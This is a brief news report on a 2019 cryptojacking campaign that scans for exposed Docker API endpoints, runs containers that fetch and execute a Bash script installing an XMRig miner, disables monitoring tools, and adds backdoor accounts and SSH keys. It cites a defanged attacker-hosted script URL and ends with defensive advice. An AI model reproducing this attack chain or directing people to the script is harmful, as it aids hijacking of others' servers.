A deadly hacking group has started mass-scanning the internet in search of Docker platforms with API endpoints, starting with those that are exposed on the internet. The action of scanning began on Nov 24, 2019 and raised instantly because of its gigantic size. And this seems not to be just an average script kiddie abuse trial.
The main drive of these particular mass-scans is to enable attackers to give commands to the Docker container and also use a digital currency miner on the firm’s Docker instances, so as to raise funds for their own selfish gains.
As per now, the hacker team making these malevolent attacks is at this time trying to scan over 60,000 IP networks (netblocks) searching for all the exposed potential Docker instances to hack. The moment the players finds any exposed host, hackers deploy the API endpoint to begin an Alpine Linux operating system that can support some of the commands that they use.
Some of the commands has the capacity to download and execute a Bash script from the hackers’ internet and data servers. Furthermore, the script runs and sets up a model XMRRig digital currency miner. Within just a period of four days of the operation, attackers have successfully mined over 15 Monero (XMR) cryptocurrencies that are worth more than USD 750.
Additionally, the malware campaign also possesses a self-defense mechanism. It also uninstalls all those monitoring agents that are identified and further damages several processes through a script that is accessed from a specific website ( http://ix[.]io/1XQh).
When you observe the script, you will find that attackers disable security items, they are also closing processes related to competitor crypto-mining botnets like DDG and others. Attackers are also forming backdoor accounts on the attacked containers, and they make SSH keys to be accessed without any hustle.
For now, users and institutions that use Docker instances are advised to straightaway check if they are putting their API endpoints at risk by leaving them widely exposed online, to shut down all the ports, and also dismiss unidentified containers under use.